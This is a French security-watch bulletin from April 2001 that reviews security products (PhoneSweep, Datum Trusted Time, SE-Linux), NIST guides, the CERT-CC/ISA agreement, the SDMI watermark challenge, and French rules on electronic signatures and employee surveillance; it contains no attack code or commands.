Veille Technologique Sécurité - cert devoteam

APOGEE Communications 

Rapport de 

Veiilllle Technollogiique Sécuriité 

N°33 

Avril 2001 

Les informations fournies dans ce document ont été collectées et compilées à partir de 

sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites 

Web, ... 

Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis 

de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains 

thèmes sont validées à la date de la rédaction du document. 

Les symboles d’avertissement suivants seront éventuellement utilisés: 

Site dont la consultation est susceptible de générer directement ou indirectement, 

une attaque sur l’équipement de consultation, voire de faire encourir un risque sur 

le système d’information associé. 

Site susceptible d’héberger des informations ou des programmes dont l’utilisation 

est répréhensible au titre de la Loi Française. 

Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la 

qualité des applets et autres ressources présentées au navigateur WEB. 

La diiffffusiion de ce documentt estt rresttrreiintte aux 

clliientts des serrviices 

VTS-RAPPORT ett VTS_ENTREPRIISE 

Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs. 

APOGEE Communications Pour tous renseignements 

1, Rue Jean Rostand Offre de veille: http://www.apogee-com.fr/veille 

91893 ORSAY CEDEX Informations: vts-info@apogee-com.fr 

© APOGEE Communications - Tous droits réservés

Avril 2001 

Au sommaire de ce rapport … 

PRODUITS ET TECHNOLOGIES 5 

LES PRODUITS 5 

TÉLÉPHONIE 5 

PHONESWEEP V3.0 5 

NOTARISATION 6 

TRUSTED TIME 6 

LES TECHNOLOGIES 7 

SYSTÈMES D'EXPLOITATION 7 

LINUX SE 7 

INFORMATIONS ET LÉGISLATION 9 

LES INFORMATIONS 9 

CERT 9 

ACCORD CERT-CC/ISA ET GRATUITÉ DES SERVICES D'ALERTE 9 

GUIDES 9 

LES PKI FÉDÉRAUX AUX US 9 

LES CONTENUS DYNAMIQUES ET CODES MOBILES 10 

PROTECTION 11 

SDMI 11 

LA LÉGISLATION 12 

INFORMATIQUE ET LIBERTÉ 12 

LA CYBERSURVEILLANCE DES SALARIÉS DANS L'ENTREPRISE 12 

SIGNATURE ELECTRONIQUE 12 

PARUTION DU DECRET D'APPLICATION 12 

LOGICIELS LIBRES 13 

LES SERVICES DE BASE 13 

LES OUTILS 13 

NORMES ET STANDARDS 15 

LES PUBLICATIONS DE L'IETF 15 

LES RFC 15 

LES DRAFTS 15 

NOS COMMENTAIRES 20 

LES RFC 20 

RFC 3091 20 

RFC 3093 20 

LES DRAFTS 20 

DRAFT-MONTENEGRO-SUCV-00.TXT 20 

DRAFT-BOSE-SMTP-INTEGRITY-00 21 

ALERTES ET ATTAQUES 22 

ALERTES 22 

GUIDE DE LECTURE 22 

FORMAT DE LA PRÉSENTATION 23 

SYNTHÈSE MENSUELLE 23 

AVIS OFFICIELS 24 

AKOPIA 24 

ALCATEL 24 

BEA 24 

CISCO 24 

COMPAQ 25 

FTP 25 

GENE6 25 

HP 25 

IP FILTER 25 

IPLANET 25 

LINUX 26 

LINUX CALDERA 26 

LINUX DEBIAN 26 

LINUX REDHAT 26 

LOTUS/IBM 26 

Veille Technologique Sécurité N°33 Page 2/59 

© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE

Avril 2001 

MICROSOFT 27 

NCM 27 

NETSCAPE 27 

NETSCREEN 27 

NTP 28 

PDG SOFTWARE 28 

PGP 28 

QUEST 28 

SAMBA 28 

SCO 28 

SUN 28 

WATCHGUARD 29 

ALERTES NON CONFIRMÉES 29 

AXENT 29 

BINTEC 29 

CA 29 

CFINGERD 29 

CISCO 29 

IBM 29 

IPLANET 29 

LIGHTWAVE 30 

MICROSOFT 30 

NETOPIA 30 

NETSCAPE 30 

ORACLE 30 

PGP 31 

QUALCOMM 31 

RAYTHEON 31 

SUN 31 

SYMANTEC 31 

TREND MICRO 32 

AUTRES INFORMATIONS 32 

REPRISES D'AVIS ET CORRECTIFS 32 

AUSCERT 32 

CERT 32 

CIAC 32 

COMPAQ 33 

FREEBSD 33 

HP 33 

IBM 33 

LINUX 33 

LINUX DEBIAN 34 

LINUX MANDRAKE 34 


MICROSOFT 34 

MYSQL 34 

NETBSD 34 

NIPC 34 

OPENBSD 35 

SCO 35 

SGI 35 

VIRUS 35 

CODES D'EXPLOITATION 35 

FTP 35 

MICROSOFT 35 

BULLETINS ET NOTES 35 

AXENT/SYMANTEC 36 

CERT 36 

CIAC 36 

IETF 36 

ISC/BIND 36 


MCAFEE 37 

MICROSOFT 37 

SANS 37 

VERS LION 37 

VIGILANTE 37 

ATTAQUES 38 

OUTILS 38 

HARDENING WINDOWS 2000 38 

TECHNIQUES 40 

CHALLENGE ARGUS SYSTÈMS 40 

ADMMUTATE 40 

NTATTACK - HONEYNET SCAN OF THE MONTH 42 



Avril 2001 

Le mot de la rédaction … 

La vulnérabilité mise en évidence dans le service de gestion du temps NTP 

mérite d'être promue vulnérabilité du mois pour au moins deux bonnes raisons: 

- l'universalité du service déployé sur de nombreux serveurs et postes pour qui 

l'obtention d'une heure fiable est une nécessité, 

- la complexité de la mise en œuvre d'une attaque dont le code doit tenir en 

moins de 70 octets. Un tel code a pourtant vu le jour en environnement 

LINUX. 

Le défi du mois d'avril lancé par le projet "honeynet" nous a conduit à 

proposer une analyse détaillée (trop peut-être) permettant de suivre pas à pas 

les actions de deux pirates. 

Enfin, pour les lecteurs qui en auraient encore le courage, nous conseillons la 

lecture de l'excellente analyse du vers LION proposée par Max Vision sur 

son site WhiteHats. 

Bonne lecture … 

L'équipe de Veille Technologique 



Avril 2001 

LES PRODUITS 

TELEPHONIE 

PHONESWEEP V3.0 

PRODUITS ET TECHNOLOGIES 

Description 

L'annonce de la disponibilité de la version 3.0 de PhoneSweep nous permet de revenir sur ce remarquable outil 

d'audit dont la première version avait été présentée dans notre rapport de Janvier 1999. 

La recherche automatique de systèmes 

informatiques accessibles depuis le réseau 

téléphonique est une activité pratiquée de 

longue date par les 'phreakers'. Le principe 

est simple : une liste de numéro téléphonique 

est automatiquement composée par un 

programme. Lorsqu’une tonalité correspondant 

à un équipement d’accès (modem, fax) est 

détectée, le numéro est enregistré pour 

utilisation ultérieure. 

La composition du numéro peut être réalisée 

par l’intermédiaire d’un modem ou par la 

génération des codes DTMF au moyen d’une 

carte son. 

La société SandStorm propose une version 

professionnelle de ces 'WarDialers' ayant pour 

objectif d’aider les sociétés à inventorier leurs 

accès téléphoniques et à identifier les 

équipements connectés derrière ceux-ci. 

La version 3.0 de PhoneSweep résulte d'une 

profonde réécriture de l'interface graphique de 

la version précédente offrant désormais un 

suivi en temps réel. L'extension des capacités 

du moteur d'identification des équipements 

autorise la reconnaissance de plus de 300 

matériels et logiciels ! 

La technologie 'Single Call' permettant l'identification de l'utilisation de la ligne (Donnée et/ou Voix) et du type 

d'équipement distant (Modem, Fax, Nas, …) en un seul appel nécessite cependant l'utilisation d'un modem compatible 

et peut ne pas fonctionner dans certains pays. Aucune information n'est ainsi fournie quant à l'utilisation de ce produit 

avec un modem intégrant un mécanisme de 'brûlage des numéros'. 

PhoneSweep fonctionne en environnement Windows 95, 98, 2000 et NT4.0. La version 3.0 gère jusqu'à 12 

modems et 30000 numéros de téléphone sous réserve d'utiliser une configuration matérielle musclée: processeur 

cadencé à 600Mhz minimum et 128Mo de mémoire requis ! 

Une fonction d'auto-test est présente qui permet de contrôler à tout instant le bon fonctionnement des modems en 

s'appuyant sur une liste de numéro d'accès fiables. Par ailleurs, une fonction d'attaque en force des identifiants et des 

mots de passe peut être activée après identification de l'équipement distant. 

Ce produit est parfaitement utilisable dans le cadre d'une stratégie de recensement et d'identification des 

équipements de communication de l'entreprise. Il offre un complément indispensable aux procédures d'inventaire 

manuelles car opérant par sondage actif des accès externes et internes. 

La concurrence dans ce domaine reste assez restreinte en dehors des multiples 'war dialers' ou 'tone dialers' qu'il 

conviendra de vérifier et d'adapter au contexte industriel. PhoneWall 20 de la société Sentry Telecom se positionne 

plus en tant que produit de protection actif équivalent d'un pare-feu et le produit d'audit téléphonique annoncé par la 

société ISS il y a maintenant plus d'un an n'a toujours pas vu le jour ! 

Mentionnons la présence, sur le site de l'éditeur, d'un exemple de politique d'utilisation des modems au sein de 

l'entreprise dont la lecture est conseillée à tout responsable ayant à traiter ce problème. 

Complément d’information 

http://www.sandstorm.net/phonesweep/ 

http://www.sentrytelecom.com/products/index.asp?b=2 



Avril 2001 

NOTARISATION 

TRUSTED TIME 

Description 

Dans le monde des Infrastructures à Clé Publique (ICP ou encore IGC), le premier concept souvent présenté est 

celui du tiers de certification. Le concept de tiers notarial prend cependant toute son importance dans les 

environnements nécessitant la conservation d'une preuve: transactions financières, documents légaux, propriété 

intellectuelle, monde médical, … 

Il est alors nécessaire de pouvoir s'appuyer sur un temps 'fiable et garanti', un temps de référence. Un tel élement est 

fourni par un serveur dédié dit serveur d'horodatage ou TSS (TimeStamp Server), l'utilisation d'Autorités 

d'horodatage ou TSA (TimeStamping Authorities) permettant d'apposer l'élément de preuve utile à la non-répudiation 

d'un document. 

Ainsi, grâce aux certificats on sait le " qui " et le "quoi " et grâce au temps de confiance on connaît le "quand". 

Différents serveurs d'horodatage existent sur le marché qui se basent 

sur la référence de temps fournie par les organismes habilités. Mais 

dans l'horodatage, le niveau de confiance accordé à la source du temps 

est primordial et ce dernier doit être précis. 

La société Datum introduit la notion de confiance dans le temps avec 

son produit Trusted Time MasterClock (TMC). Celui-ci peut être 

utilisé afin de certifier et de tracer le temps depuis une source légale du 

temps UTC (Universal Coordinated Time) fournie par l'Institut de 

Mesure National de chaque pays, chaque Institut de Mesure National se 

synchronisant lui-même avec l'Institut de Mesure International, le BIPM 

(International Bureau of Weights and Measures) situé en France. 

Le Trusted Time MasterClock (TMC Rubidium-based) de Datum se 

Trusted Master Clock 

synchronise, après authentification mutuelle, avec l'Institut de Mesure 

NT Server (PCI Bus) 

National à travers le protocol DS/NTP (Datum Secure/Network Time 

Protocol). Le temps est certifié précis à 10 ms près par rapport à l'UTC. 

Certified Clock 

Les caractéristiques techniques du Trusted Time MasterClock (TMC) 

GPS Receiver 

sont les suivantes: 

- fournit le temps UTC (Coordinated Universal Time) certifié de 

l'Institut de Mesure National aux serveurs d'horodatage TSS, 

- supporte environ 200 serveurs d'horodatage TSS, 

- inclus une référence GPS pour l'initialisation et la supervision du TMC 

primaire, 

- fournit des journaux certifiés pour l'audit 

Le Trusted Time MasterClock transmet à son tour, après 

authentification mutuelle, ce temps UTC certifié au serveur d'horadatage 

Trusted Time StampServer (TSS). Le protocol DS/NTP, variation du 

protocole NTP (Network Time Protocol) fonctionnant sur TCP, est ici 

encore utilisé. Le temps est certifié précis à 100 ms près par rapport à 

l'UTC. 

Rubidium Oscillator 

I/O Read/Set 


© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE 

PCI 

Modem 

NTA 

(UTC Certification) 

Timing 

Engine 

Ethernet 

NIC 

Trusted 

Local Clocks 

Les caractéristiques du Trusted Time StampServer sont les suivantes: 

- "tamper resistant PCIv2.1" 

- carte prévue pour répondre au standard FIPS 140-1 L3 

- calcul cryptographique réalisé par un module conforme FIPS 140-1 L2 

- générateur pseudo-aléatoire conforme FIPS 140-1 L3 

- paramètres de configuration en mémoire non-volatile (Flash EPROM) 

- journaux d'audit, alarme 

- joue le rôle d'Autorité d'horodatage ou TSA (Time Stamp Authority) 

- suit les recommandations du document PKIX Time Stamp de l'IETF 

Ces deux produits répondent aux attentes et besoins exprimés dans le domaine des Infrastructures à Clé Publique 

(ICP ou IGC), et plus largement dans tout environnement nécessitant la génération d'une preuve horodatée. Notons 

cependant qu'en l'absence de jurisprudence, il est difficile de statuer sur la viabilité juridique de ces concepts et 

mécanismes. 


http://www.datum.com/tt/datasheet/TMasterClock_StampServer.htm 

http://www.datum.com/tt/index.htm 

ftp://ftp.nordu.net/internet-drafts/draft-ietf-pkix-time-stamp-14.txt

Avril 2001 

LES TECHNOLOGIES 

SYSTEMES D'EXPLOITATION 

LINUX SE 

Description 

'SE-LINUX' ou 'LINUX-SE', l'un des nombreux avatars du système LINUX, reste unique dans son 

genre. Linux Security Enhanced est en effet 'édité' et 'distribué' sous licence GPL (General Public 

License) par l'un des plus célèbre organisme du monde de la sécurité: la NSA. 

Un rapide historique permet de mieux comprendre la genèse de ce système d'exploitation et l'implication d'un 

organisme de défense. 

Le contrôle d'accès habituellement utilisé dans les dispositifs de sécurité s'il est adapté aux besoins courants de 

sécurité ne convient dans certains domaines dont le domaine militaire. En effet, le modèle utilisé, dit 'Modèle 

Discrétionnaire' repose principalement sur l'hypothèse que le créateur d'un objet - généralement une ressource de 

type fichier - dispose de tous les droits sur cette ressource. Les droits d'accès sont laissés à la discrétion du créateur 

qui peut ainsi volontairement, ou non, déclasser une information. 

A contrario, le 'Modèle Mandataire', ou plus largement, les modèles 'Modèles non discrétionnaires' séparent 

explicitement le domaine de l'utilisation d'une ressource de celui de la gestion des droits d'accès. L'utilisateur n'a ainsi 

plus aucune possibilité de manipuler les droits d'accès des ressources quand bien même les auraient-ils créées. Une 

politique de sécurité, plus ou moins flexible, dictera explicitement les opérations autorisées pour un sujet identifié sur 

un objet dûment référencé. 

Le modèle ce type le plus connu est probablement le modèle de contrôle d'accès de Bell-Lapaluda longtemps cité 

comme référence dans les environnements utilisant une classification à niveau d'habilitation. Un utilisateur du niveau 

X (ie: Secret) accédera à une ressource classifiée au même niveau en étant autorisé à créer* une ressource de 

niveau supérieur (ie: TopSecret). Notons à ce propos que les architectes du noyau du système Windows NT 3.1 

avaient annoncé en 1992 avoir conçu celui-ci dans l'optique de pouvoir obtenir une certification DoD au niveau B2, 

niveau imposant le support d'un modèle d'accès mandataire … 

En 1998, une équipe de 6 chercheurs de la NSA fait sensation durant la 21ième conférence du NISC en présentant 

un papier intitulé 'The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing 

Environments' dans lequel le Modèle Discrétionnaire est mis à mal (cf. Rapport du mois de Janvier 1999). 

Cette prise de position conduit une équipe - constituée de deux chercheurs de la NSA, de trois membres de 

l'université de l'Utah et d'un chercheur de la société Secure Computing - à étudier une architecture système 

ouverte, flexible et apte à supporter un modèle de contrôle d'accès mandataire. Dénommée 'FLASK' pour ' FLux 

Advanced Security Kernel', cette architecture a fait l'objet d'un premier prototype utilisant un système d'exploitation 

de type micro-noyau dénommé FLUKE (FLUx Kernel Environnement). Les résultats démontrant la viabilité du modèle 

FLASK sont publiés lors de la conférence USENIX en Août 1999. 

Le modèle FLASK s'appuie ainsi sur une architecture comportant deux composantes: 

- Le gestionnaire d'objet (Object Manager) chargé de 

centraliser toutes les requêtes concernant la sécurité. 

- Le serveur de sécurité (Security Server) chargé de répondre 

aux requêtes transmises par le gestionnaire d'objet. 

Trois services sont mis à disposition du gestionnaire d'objet 

- Un service de validation chargé de prendre les décisions 

concernant les demandes d'autorisation d'accès, de labelisation 

des objets et de l'allocation en cas d'accès multiples. 

- Un service de notification informant de tout changement dans 

la politique de sécurité gérée par le serveur de sécurité, 

- Un service de cache (AVC ou Access Vector Cache) conservant 

les décisions prises par le serveur de sécurité. Slide 8 de la publication présentée à USENIX 

Face au succès du système LINUX et dans un but 'altruiste' -"to transfer the technology to a larger developer and 

user community" - la NSA engage l'intégration de FLASK au sein de cet environnement donnant naissance à la 

version Security Enhanced. Notons que la version courante de LINUX SE reste fortement limitée en terme de 

fonctionnalité, un important travail d'intégration restant à effectuer. 



Avril 2001 

La NSA lance à ce sujet un appel à volontariat pour traiter les tâches suivantes dont: 

- L'intégration d'IPSEC avec un contrôle d'accès réseau mandataire, 

- L'intégration du contrôle d'accès mandataire dans NFS, 

- La simplification et amélioration du système de configuration des politiques de sécurité, 

- La réalisation des tests de conformité et de performance, 

- L'implémentation de l'ensemble contrôles d'accès mandataires décrit dans le document original, 

- L'implémentation de la polyinstanciation des répertoires et des ports, 

- L'intégration des mécanismes de notification, 

- L'intégration d'un système de fichier cryptographique avec contrôle d'accès mandataire, 

- L'implémentation des SID, 

- … 

En pratique, l'utilisateur final d'un système LINUX SE ne verra quasiment aucune différence à l'exception de 

l'apparition de la commande 'newrole' et de la modification du comportement de 12 utilitaires 'sensibles': 'chcon' , 

'df' , 'find', 'id', 'install', 'killall', 'ls', 'mkdir', 'mknod', 'mkfifo', 'ps', 'pstree', 'runas' et 'tar'. 

Le développeur aura, lui, un travail de remise en cause conséquent, la version courante de Linux SE intégrant 50 

nouveaux appels systèmes acceptant pour la plupart un nouvel argument: le SID ou Security Identifier. Les 

exemples de programmation fournis avec la distribution permettent de se rendre compte de la complexité des 

nouveaux mécanismes d'autorisation. 

Linux SE est délivré sous la forme d'une distribution source complète de 31Mo contenant le Noyau 2.4.2 modifié, 

les utilitaires, les programmes de test et des exemples de politiques de sécurité. La documentation (1Mo) et les 

correctifs élémentaires ( 430Ko) dont ceux applicables aux noyaux 2.2.18 et 2.4.2 peuvent être téléchargés 

indépendamment. 

* propriété dite '*' permettant d'éviter le problème de la déclassification 

Complément d'information 

http://www-106.ibm.com/developerworks/library/s-selinux/?n-s-381 

http://www.cs.utah.edu/flux/fluke/html/flask.html 

http://www.nsa.gov/selinux/docs.html 



Avril 2001 

LES INFORMATIONS 

CERT 

INFORMATIONS ET LEGISLATION 

ACCORD CERT-CC/ISA ET GRATUITE DES SERVICES D'ALERTE 

Description 

Le CERT-CC, organisme Américain financé sur fonds publics, a annoncé dernièrement sa collaboration avec un 

programme purement privé et commercial, l'Internet Security Alliance ou ISA. A la suite de la levée de boucliers 

de la part des utilisateurs dont beaucoup craignent que toutes les activités d'alerte et d'information ne deviennent 

purement mercantiles, la prise de position du CERT a fait 'La Une' des journaux. 

A ce jour, le libre accès aux informations ne semble 

pas être remis en cause, les participants au 

programme ISA ayant cependant le 'privilège' d'être 

informés en priorité (45 jours avant le grand public 

!) et de disposer d'un accès direct à la base de 

connaissance maintenue par le CERT-CC. 

La lecture des documents fournis par l'ISA démontre 

que le fond de commerce de l'ISA reste avant tout 

la base de connaissance du CERT-CC: 

"The operational concept to achieve these goals is 

based on the enormous store of data made available 

by the CERT/CC and the analytical expertise of its 

CERT® Analysis Center to harness this data for the 

benefit of ISA members. These centers have unmatched 

access to comprehensive data from their 

partners in both the public and private sectors." 

Plusieurs niveaux d'abonnement sont proposés, le 

niveau "SPONSORS" permettant de participer aux 

réunions plénières de l'ISA. 


http://www.cert.org/faq/certcc_ISA.html 

http://www.theregister.co.uk/content/8/18493.html 

GUIDES 

LES PKI FEDERAUX AUX US 

Description 

Intitulé 'PKIs within the Federal government', ce document de 54 pages publié par le NIST a pour objectif 

d'assister les responsables des agences fédérales américaines dans leur choix d'infrastructure PKI. Il expose 

notamment les principes retenus pour assurer l'interconnexion des différents PKI fédéraux. 

Les problèmes abordés n'étant pas spécifiques des infrastructures gouvernementales, ce document constitue une 

excellente introduction à la problématique de l'interconnexion de PKI notamment pas la présence d'un préliminaire de 

plus de 26 pages entièrement consacré à la présentation des éléments techniques constitutifs de ceux-ci, des services 

associés et des risques dont il faut tenir compte. 



Avril 2001 

La suite du document est consacré à l'infrastructure 

'Federal PKI' dont l'objectif est de fédérer les 

différentes Autorités de Certification ou AC 

indépendantes mises en place par les Agences Fédérales. 

Dans un tel contexte, la principale difficulté provient de 

la diversité des moyens utilisés par les agences dont 

certaines ont fait appel à des Autorités de Certification 

commerciales. 

L'infrastructure 'Federal PKI' doit offrir un service 

permettant d'interconnecter les AC des Agences 

Fédérales par un chemin de certification fiable et de 

confiance. 

Ce service est normalement assuré par une passerelle 

spécialisée dite 'Bridge CA' ou BCA jouant le rôle d'un 

simple médiateur entre domaines de confiance. 

Il est important de noter qu'un BCA n'a pas à jouer le 

rôle d'une autorité de certification racine à partir de 

laquelle sont initialisés les chemins de certification. 

Les AC fédérales s'appuieront sur une passerelle située 

dans le domaine Fédéral, le FBCA ou Federal BCA, 

pour communiquer entre eux ou avec des AC situées en 

dehors de ce domaine. A cette fin, une cross certification 

sera effectuée entre les AC respectant un certain 

nombre de règles imposées et le FBCA. 

Ces règles prennent notamment la forme de profils mandataires ou optionnels, venant compléter ceux décrits dans le 

RFC2459 (PKIX Profile), et spécifiant les extensions dans les certificats (x509 version 3) et dans les CRL (version 2). 

Une démarche conduite en 7 étapes dont l'objectif est de faciliter le déploiement d'un PKI conforme aux exigences de 

l'infrastructure précitée est proposée en fin de document: 

1. Analyse des données et des applications de l'organisation susceptibles d'utiliser les services du PKI 

2. Etude des normes et des modèles génériques de politique mis à disposition 

3. Ecriture d'un premier jet de politique de certification en s'appuyant sur celle du FBCA 

4. Sélection d'un produit PKI ou d'un fournisseur de service 

5. Ecriture de la CPS (Certification Practice Statement ou Enoncé des Pratique de Certification ) dont une copie sera 

maintenue sur le BCA 

6. Réalisation d'un pilote sur une durée suffisante pour acquérir une expérience significative 

7. Interconnecter son PKI en demandant la cross-certification de l'AC avec le FBCA 

Les problèmes abordés n'étant pas spécifiques des infrastructures gouvernementales, nous recommandons la lecture 

de ce document qui constitue une excellente introduction à la problématique de l'interconnexion de PKI. 


http://csrc.nist.gov/publications/drafts.html 

http://csrc.nist.gov/pki/twg/y2000/papers/twg-00-18.xls 

http://csrc.nist.gov/pki/twg/y2000/doc_reg_00.htm 

LES CONTENUS DYNAMIQUES ET CODES MOBILES 

Description 

Intitulé 'Guidelines on Active Content and Mobile Code', ce guide de 45 pages publiée par le NIST propose un 

état de l'art des technologies ayant permis d'étendre les fonctionnalités initiales proposées par le WEB. 

Destiné à sensibiliser les personnels des Agences Fédérales Américaines, ce document ne propose aucune solution 

innovante que ce soit sur le plan technique ou organisationnel en dehors des traditionnelles mesures de prévention. 

Sa principale qualité réside donc dans l'utilisation d'une approche pédagogique trop rarement rencontrée: chaque 

élément vital de l'infrastructure - technologies clefs ou composants logiciels - fait l'objet d'un paragraphe détaillant 

non seulement la fonctionnalité associée mais aussi l'historique attaché à cet élément: son origine et les évolutions 

successives … 

Un important chapitre est ainsi réservé à la présentation de "l'anatomie" d'un navigateur et d'un serveur WEB en 

insistant, d'une part, sur les différentes méthodes d'activation d'un code par le navigateur,et d'autre part, sur les 

procédés de traitement spécifiques des pages dynamiques - SSI, ASP et servlet - par le serveur. 

Un second chapitre aborde les risques induits par les diverses technologies de présentation employées dont les 

langages de visualisation PostScript et PDF, les langages de programmation Java et VBScript, les composants 

autonomes Activ/X, le macro-langage VBA et enfin les applications externes telles ShockWave ou QuickTime. 

Cette approche permet de mieux comprendre - voire de justifier - les défaillances d'une infrastructure - The WEB - 

initialement conçue dans l'optique d'assurer un service élémentaire fiable et sécurisé mais ayant subit des 

modifications structurelles fondamentales désormais irréversibles. 

Tout en essayant d'avoir une approche positive, les auteurs insistent sur les nombreux facteurs endémiques qui 

continueront à favoriser l'insécurité de l'Internet en général, et des infrastructures WEB en particulier 

- Le facteur d'échelle conduisant à faire coexister les systèmes les plus solides car issus des dernières évolutions 



Avril 2001 

technologiques avec des systèmes fragilisés par l'âge et l'obsolescence des logiciels utilisés. Ces derniers seront les 

cibles privilégiées des attaques car offrant des plates-formes aptes à relayer ces attaques au sein de 

l'infrastructure, 

- La difficulté d'appliquer des correctifs sur un système opérationnel conduisant à devoir laisser ouverte une 

fenêtre temporelle plus ou moins longue durant laquelle ce système est totalement vulnérable, 

- La diminution du niveau de qualité (et du contrôle de la qualité) des développements, la qualité n'étant plus un 

argument de vente mais plutôt un frein conduisant à retarder la mise sur le marché des produits. La présence quasi 

systématique de fonctions cachées tels les 'Easters Eggs' dans les produits les plus réputés tend à prouver que 

l'éditeur est en passe de perdre le contrôle de sa propre chaîne de production, 

- La confusion engendrée par les exigences de modularité et de flexibilité des constituants conduisant les 

développeurs à utiliser telles quelles, et sans précautions particulières, des technologies ne permettant plus de 

distinguer le programme des données, 

- La complexité grandissante des applications menant à un code de plus en plus volumineux et, par voie de 

conséquence, difficilement vérifiable, 

- Les trop nombreux paramètres de configuration devant être maîtrisés pour garantir un niveau de sécurité 

minimal, 

- L'absence d'éthique des sociétés collectant et archivant des données personnelles sur leurs sites WEB sans pour 

autant renforcer le niveau de sécurité de ceux-ci, 

- Les atteintes en déni de service engendrées par le raccordement, sur un réseau ouvert tel l'Internet, de 

composants dont les ressources ne sont pas illimitées. 


http://csrc.nist.gov/publications/drafts.html 

PROTECTION 

SDMI 

Description 

SDMI, acronyme de Secure Digital Music Initiative, résulte du regroupement des principaux acteurs dans le domaine 

de l'édition et de la publication musicale. L'objectif de cette initiative est de spécifier les bases d'un système de 

protection du contenu musical indépendamment de la forme du support, étant cependant entendu que celui-ci est 

digital ! 

Le problème devant être prioritairement traité est celui de la diffusion d'un contenu sur un support autre que celui 

pour lequel il a été généré. En d'autres termes, le système de protection devra permettre de distinguer entre un 

contenu original et un contenu similaire mais ayant fait l'objet d'une manipulation visant par exemple à réduire le 

volume à transférer, la copie intégrale ('rip') d'un support original restant autorisée. 

Bien entendu, un tel système n'a de sens qu'à la condition que tous les dispositif permettant la restitution du 

contenu soient conformes aux spécifications SDMI. Cette conformité sera sanctionnée par le label DMAT 

(Digital Music Access technology). 

Afin de valider la solidité des concepts et principes ainsi établis pour le premier palier technique, dit phase 1, un défi 

public a été lancé en Septembre 2000 pour une durée de 3 semaines. Ce palier utilise deux mécanismes, l'un 

permettant de prouver la non-manipulation du contenu au moyen d'une signature cryptographique de celui-ci, le 

second visant à fournir un moyen de marquage non altérable du contenu utilisant la technique dite du 

'watermarking'. Un contenu non marqué et ne comportant pas de signature est considéré comme acceptable car 

antérieur à la mise en place du système; il faut bien assurer la compatibilité avec les contenus existants ! 

Le défi portait sur ce dernier mécanisme et avait pour objectif d'éliminer le marquage effectué au moyen de 6 

algorithmes distincts sur des contenus imposés sans que cette manipulation ne soit détectable. A cette fin, trois 

fichiers ont été fournis pour chaque algorithme: 

- un fichier non marqué contenant une chanson 

- le même fichier mais marqué 

- un fichier marqué contenant une autre chanson 

La bonne éradication du marquage de ce dernier fichier pouvait être contrôlée par chaque participant par le biais d'un 

ORACLE mis à disposition et accessible par courrier électronique. L'utilisation d'un ORACLE (réponse binaire 

OUI/NON) permet d'éviter de divulguer l'algorithme utilisé tout en garantissant le bon déroulement des tests. 

Bien que les participants se soient engagés à ne pas divulguer les techniques employées pour contourner la protection 

offerte par le marquage, les rapports techniques détaillés concernant les attaques menées par deux groupes ont été 

rendus disponibles sur l'Internet depuis le début de l'année: 

- Groupe Français: Julien Bœuf et Julien P Stern via le site de JP.Stern 

- Groupe Américain: Université de Princeton via 'Cryptome' 

Ces rapports seraient passés inaperçus du public si une tentative d'interdiction de la publication du rapport du groupe 

de l'université de Princeton à l'occasion de la conférence International Information Hiding Workshop devant se 

tenir en avril n'avait été dévoilée par le site 'Cryptome'. 

Ce document, démontre en effet, chiffres à l'appui, l'efficacité et l'ingéniosité des techniques d'analyses employées, en 

considérant que 2 des 6 défis ne pouvaient relevés avec le matériel fourni: 



Avril 2001 

1. Algorithme A Watermark Marque non éliminée (Nécessite une attaque en force et un délai plus important) 

2. Algorithme B Watermark Marque éliminée 

3. Algorithme C Watermark Marque éliminée 

4. Algorithme D Signature Vérification impossible (Oracle biaisé rejettant systématiquement les tests valides) 

5. Algorithme E Signature Défi biaisé (Exemples fournis insuffisants) 

6. Algorithme F Watermark Marque éliminée 

Attention, le document a été retiré du site original situé en Allemagne à la suite d'une injonction de la part de la 

société XEROX, du matériel intellectuel appartenant à cette société étant a priori présent dans le document. Notons 

que celui-ci est en effet co-signé par Drew Dean, chercheur au Xerox Computer Science Laboratory de Palo Alto. 


Http://cryptome.org/sdmi-attack.htm 

http://www.julienstern.org/sdmi/ 

http://www.sdmi.org/ 

LA LEGISLATION 

INFORMATIQUE ET LIBERTE 

LA CYBERSURVEILLANCE DES SALARIES DANS L'ENTREPRISE 

Description 

La CNIL (Commission Nationale de l'Informatique et des Libertés) publie un rapport d'étude intitulé 'la 

cybersurveillance des salariés dans l'entreprise'. Ce rapport illustre les différentes techniques permettant de contrôler 

les salariés en opposition au respect de la vie privée de chacun, tout en évoquant la loi et la jurisprudence françaises. 

Cette étude très attendue risque de faire acte au sein des entreprises et des syndicats représentatifs des salariés. 


http://www.cnil.fr/thematic/docs/entrep/cybersurveillance.pdf 

http://www.cnil.fr/thematic/surveillance.htm 

SIGNATURE ELECTRONIQUE 

PARUTION DU DECRET D'APPLICATION 

Description 

Le décret portant application de l'article 1316-4 du code civil relatif à la signature électronique est paru au journal 

officiel le 31 Mars 2001 sous la référence 2001-272. 

Articulé en 4 chapitres, ce décret précise notamment les caractéristiques, exigences de sécurité et conditions 

d'utilisation des dispositifs de création et de vérification des signatures et certificats: 

Chapitre I: Des dispositifs sécurisés de création de signature électronique 

Chapitre II: Des dispositifs de vérification de signature électronique 

Chapitre III: Des certificats électroniques qualifiés et des prestataires de services de certification électronique 

Chapitre IV: Dispositions diverses 

Notons que le site du 'Programme d'action gouvernemental pour la société de l'information' (Services du Premier 

Ministre) propose un excellent dossier en ligne sur la signature électronique abordant à la fois les points de vue 

techniques et législatifs: 

L'essentiel : la signature électronique en quelques mots et images (animation) 

Questions/réponses : 

la signature électronique 

la certification électronique 

la signature électronique... pour quels usages ? 

le décret 

l'utilisation de la signature électronique 

Dossier technique : définitions et mécanismes de la signature électronique 

Pour en savoir (encore) plus : 

- Communiqué de presse du Premier ministre du 3 avril 2001 

- Loi du 13 mars 2000 


http://www.legifrance.gouv.fr/citoyen/jorf_nor.ow?numjo=JUSC0120141D 

http://www.legifrance.gouv.fr/citoyen/jorf_nor.ow?numjo=JUSX9900020L 

http://www.internet.gouv.fr/francais/textesref/pagsi2/signelect/sommaire.htm 



Avril 2001 

LES SERVICES DE BASE 

